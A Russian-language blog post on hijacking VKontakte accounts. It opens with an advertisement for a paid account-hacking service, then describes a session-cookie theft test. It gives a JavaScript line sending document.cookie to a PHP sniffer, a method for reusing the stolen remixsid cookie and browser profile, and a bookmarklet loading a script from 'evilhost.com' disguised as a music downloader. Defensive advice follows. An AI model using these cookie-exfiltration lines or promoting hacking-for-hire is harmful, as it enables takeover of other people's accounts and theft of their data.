Легко ли взломать страницу вконтакте?
Почта: edoxac@gmail.com

Сайт: vzlom.info
ЗАКАЗАТЬ ВЗЛОМ

Достаточно часто на просторах рунета, можно встретить объявления типа: Взломаю любой аккаунт социальной сети, взмылю мыло по шустрому.
Взлом страницы вконтакте Да и так, как одна из моих профессий тесно связана  с IT безопасностью, сегодня я решил немного эту тему по развивать.
А именно протестировать возможность взлома страницы вконтакте, посредством подмены параметров файлов cookies.
Специально для этих целей я зарегистрировал два аккаунта vk.соm, естественно вошел в них на разных компах, и сохранил куки.
В качестве клиентской ОС использовал горячо любимый мною Linux, вторая страница была открыта в Opera (на ОС Windows XP) так,
как только этот интернет браузер имеет возможность изменять параметры cookies. В качестве Web сервера использовал LAMP.
Весь тест проводился в локальной сети, с выходом в интернет через прокси сервер. На веб сервере, я по быстрому набросал и разместил PHP скрипт (сниффер),
который принимал клиентские куки, вот такого содержания: Сниффер принимающий кукисы готов, а передавал я их с помощью JavaScript,
вбив в адресную строку: javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie; Я не стал полностью автоматизировать
работу клиента, т. к. это уже выходит за рамки моих морально=этических представлений, ибо любой остро желающий может разработать его
самостоятельно. Следующей задачей для меня была подмена уведенных куков. И это оказалось вообще проще простого. Открыв браузер
Опера => Настройки => Общие настройки => Расширенные => Cookies Opera Cookies Я изменил только значение параметра куков remixsid
и сразу же вошел в другой аккаунт Но стоило мне сменить ip адрес, как передо мной во весь экран на рисовалась балалайка
(старая такая: добрая, русская) Тогда я тупо скопировал всю папку C:\Users\Master-It\AppData\Roaming\Opera\Opera\ авторизовавшись
уже в Windows 7, инициируя действия трояна, и опять сменил ip адрес, потом заменил содержимое папок Opera, и опять вошел в (чужой) аккаунт!
И какой из всего этого напрашивается вывод? Да очень простой! Взлом аккаунта очень мало вероятен, если вы переходите по ссылке на какой-то
[сомнительный] сторонний ресурс, но зато он будет возможен при переходе на фейковую страницу. И для этого злоумышленник, как правило использует
социальную инженерию. Т. е. находит метод при котором вы самостоятельно сливаете ему свои данные от страниц социальных сетей. С vk.com не
прокатывают  Brute Force Attack   с использованием утилит жесткого перебора паролей. Ибо после неудачной 3-5 попытки включается капча. В качестве
альтернативы могут выступать вирусы трояны, которые просто воруют пользовательские данные [пачками] пакетами, и отправляют их своим
разработчикам (клиентам). И уж точно, я бы не стал использовать для этих целей какие-то сторонние утилиты, ибо тема бесплатного сыра кажется
мне уже давно избитой, и пользы от него несоизмеримо меньше нежели вреда. Ведь бот нет расширяется с каждым днем в арифметической
прогрессии. Взлом ВКонтакте (vk.com)  и социальная инженерия Сейчас я приведу пример эксплуатации социальной инженерии, для взлома аккаунта vk.com. Многие знают, что в популярной соц. сети имеется огромная база медиа файлов, около 1000 ТБ, но это собственно и не соль, а вот именно соль заключается в том, что многие хотят скачать музыку из соц. сети  вконтакте , и находят для этих целей соответствующие скрипты. Самый банальный скрипт, который незаметно для пользователя, уведет его файлы куки, может выглядеть так: javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0); Естественно, пользователь сам его вставляет в адресную строку браузера, и активирует. Самое интересное, что после этого он еще и скачивает музыку, в то время, как злоумышленник анализирует его файлы cookies. Как защитить свой аккаунт вконтакте от взлома? Вопрос конечно больше риторический, но все же  варианты есть: 1. Не сохранять Cookies и прочие пользовательские данные на жесткий диск. 2. Использовать хороший антивирус + файрвол. 3. Прежде чем нажать на ссылку, смотреть куда она ведет. 4. Во избежание ввода данных на фейковой странице, внимательно смотреть Url в адресной строке браузера. Однако, если вы открываете свою страницу вк из закладок, а в системе изменен файл hosts, то вы будете переброшены на фейковую страницу, при этом url в адресной строке будет без изменений vk.com. 5. Никогда не светить свою реальную почту, которая связана с чем бы то ни было. 6. Не хранить логины и пароли в не зашифрованном виде на локальном компьютере, например в текстовом файле. 7. Создавать сложные пароли с использованием цифр и букв в верхнем и нижнем регистре, а также добавлять спец. символы. 8. Никогда не переходить по почтовым ссылкам. Злоумышленник может с легкостью подделать адрес отправителя почты с помощью PHP скрипта. P.S. Ну и конечно же периодически создавать контрольные точки восстановления Windows. Ну это так, на всякий случай!
Источник материала: http://master-it.biz/hack-vkontakte.html При копировании материала, открытая, индексируемая ссылка на источник ОБЯЗАТЕЛЬНА! С уважением ©э® Master-It.biz